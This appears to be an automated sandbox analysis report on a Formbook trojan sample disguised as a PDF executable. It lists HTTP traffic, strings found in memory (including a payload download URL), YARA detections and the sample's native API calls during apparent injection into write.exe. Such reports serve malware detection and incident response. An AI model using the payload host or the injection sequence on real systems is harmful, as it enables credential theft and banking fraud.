        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:30:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:30:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:30:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:30:11 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://ogunlewefamily.org.ng/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentContent-Encoding: gzipContent-Length: 7038Content-Type: text/html; charset=UTF-8
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:30:14 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://ogunlewefamily.org.ng/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentContent-Encoding: gzipContent-Length: 7038Content-Type: text/html; charset=UTF-8
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:30:17 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://ogunlewefamily.org.ng/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentContent-Encoding: gzipContent-Length: 7038Content-Type: text/html; charset=UTF-8
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:30:26 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:30:28 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:30:31 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:30:34 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:31:18 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:31:21 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:31:23 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:31:26 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:32:39 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:32:42 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:32:45 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:32:47 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:32:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:32:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:32:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:33:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:33:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:33:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:33:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:34:28 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:35:07 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:35:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13451908370.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13452315319.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639693496.0000000006920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13451908370.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13452315319.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639693496.0000000006920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: BM-FM_NR.24040718PDF.exe, BM-FM_NR.24040718PDF.exe, 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmp, BM-FM_NR.24040718PDF.exe, 00000000.00000000.12883213848.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: BM-FM_NR.24040718PDF.exe, 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmp, BM-FM_NR.24040718PDF.exe, 00000000.00000000.12883213848.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000626000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13451908370.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13452315319.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639693496.0000000006920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13534857876.00000000068FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://absorbante-calitate.ro/
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13534857876.00000000068FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://absorbante-calitate.ro/0H
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13640013314.0000000006A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://absorbante-calitate.ro/calitateX/lUMnxNJflRDqoVSbz65.bin
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13640013314.0000000006A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://absorbante-calitate.ro/calitateX/lUMnxNJflRDqoVSbz65.binCredscroabsorbante-calitate.ro/calit
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13451908370.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13452315319.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639693496.0000000006920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: unknownNetwork traffic detected: HTTP traffic on port 50244 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50244
        Source: unknownHTTPS traffic detected: 37.251.143.215:443 -> 192.168.11.20:50244 version: TLS 1.2
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 0_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405086

        E-Banking Fraud

        Source: Yara matchFile source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B234E0 NtCreateMutant,LdrInitializeThunk,2_2_36B234E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_36B22D10
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_36B22B90
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B23C90 NtOpenThread,2_2_36B23C90
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B23C30 NtOpenProcessToken,2_2_36B23C30
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B238D0 NtGetContextThread,2_2_36B238D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B24570 NtSuspendThread,2_2_36B24570
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B24260 NtSetContextThread,2_2_36B24260
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22EB0 NtProtectVirtualMemory,2_2_36B22EB0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22E80 NtCreateProcessEx,2_2_36B22E80
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22ED0 NtResumeThread,2_2_36B22ED0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22EC0 NtQuerySection,2_2_36B22EC0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22E00 NtQueueApcThread,2_2_36B22E00
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22E50 NtCreateSection,2_2_36B22E50
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22FB0 NtSetValueKey,2_2_36B22FB0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22F30 NtOpenDirectoryObject,2_2_36B22F30
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22F00 NtCreateFile,2_2_36B22F00
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22CF0 NtDelayExecution,2_2_36B22CF0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22CD0 NtEnumerateKey,2_2_36B22CD0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22C30 NtMapViewOfSection,2_2_36B22C30
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22C20 NtSetInformationFile,2_2_36B22C20
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22C10 NtOpenProcess,2_2_36B22C10
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22C50 NtUnmapViewOfSection,2_2_36B22C50
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22DA0 NtReadVirtualMemory,2_2_36B22DA0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22DC0 NtAdjustPrivilegesToken,2_2_36B22DC0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22D50 NtWriteVirtualMemory,2_2_36B22D50
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22AA0 NtQueryInformationFile,2_2_36B22AA0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22A80 NtClose,2_2_36B22A80
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22AC0 NtEnumerateValueKey,2_2_36B22AC0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22A10 NtWriteFile,2_2_36B22A10
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05204570 NtSuspendThread,LdrInitializeThunk,5_2_05204570
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05204260 NtSetContextThread,LdrInitializeThunk,5_2_05204260
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_05202D10
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202DA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_05202DA0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202C30 NtMapViewOfSection,LdrInitializeThunk,5_2_05202C30
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202C50 NtUnmapViewOfSection,LdrInitializeThunk,5_2_05202C50
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202CF0 NtDelayExecution,LdrInitializeThunk,5_2_05202CF0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202F00 NtCreateFile,LdrInitializeThunk,5_2_05202F00
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202E00 NtQueueApcThread,LdrInitializeThunk,5_2_05202E00
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202E50 NtCreateSection,LdrInitializeThunk,5_2_05202E50
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202ED0 NtResumeThread,LdrInitializeThunk,5_2_05202ED0
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_052029F0 NtReadFile,LdrInitializeThunk,5_2_052029F0
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202B00 NtQueryValueKey,LdrInitializeThunk,5_2_05202B00
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_05202B10
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202B80 NtCreateKey,LdrInitializeThunk,5_2_05202B80
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_05202B90
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202BC0 NtQueryInformationToken,LdrInitializeThunk,5_2_05202BC0
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202A10 NtWriteFile,LdrInitializeThunk,5_2_05202A10
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202A80 NtClose,LdrInitializeThunk,5_2_05202A80
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202AC0 NtEnumerateValueKey,LdrInitializeThunk,5_2_05202AC0
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_052034E0 NtCreateMutant,LdrInitializeThunk,5_2_052034E0
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_052038D0 NtGetContextThread,LdrInitializeThunk,5_2_052038D0
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202D50 NtWriteVirtualMemory,5_2_05202D50
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202DC0 NtAdjustPrivilegesToken,5_2_05202DC0
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202C20 NtSetInformationFile,5_2_05202C20
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202C10 NtOpenProcess,5_2_05202C10
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202CD0 NtEnumerateKey,5_2_05202CD0
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202F30 NtOpenDirectoryObject,5_2_05202F30
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202FB0 NtSetValueKey,5_2_05202FB0
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202EB0 NtProtectVirtualMemory,5_2_05202EB0
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202E80 NtCreateProcessEx,5_2_05202E80
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202EC0 NtQuerySection,5_2_05202EC0
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_052029D0 NtWaitForSingleObject,5_2_052029D0
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202B20 NtQueryInformationProcess,5_2_05202B20
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202BE0 NtQueryVirtualMemory,5_2_05202BE0
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202AA0 NtQueryInformationFile,5_2_05202AA0
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05203C30 NtOpenProcessToken,5_2_05203C30
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05203C90 NtOpenThread,5_2_05203C90
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FE76B0 NtCreateFile,5_2_02FE76B0
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FE7AC0 NtAllocateVirtualMemory,5_2_02FE7AC0
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FE78E0 NtDeleteFile,5_2_02FE78E0
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FE7800 NtReadFile,5_2_02FE7800
        Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FE7970 NtClose,5_2_02FE7970
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040310F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Windows\resources\0409
        Source: C:\Windows\SysWOW64\write.exe Code function: String function: 05205050 appears 58 times
        Source: C:\Windows\SysWOW64\write.exe Code function: String function: 0524EF10 appears 105 times
        Source: C:\Windows\SysWOW64\write.exe Code function: String function: 0523E692 appears 86 times
        Source: C:\Windows\SysWOW64\write.exe Code function: String function: 05217BE4 appears 111 times
        Source: C:\Windows\SysWOW64\write.exe Code function: String function: 051BB910 appears 280 times
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: String function: 36B25050 appears 50 times
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: String function: 36B5E692 appears 80 times
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: String function: 36ADB910 appears 240 times
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: String function: 36B37BE4 appears 100 times
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: String function: 36B6EF10 appears 78 times
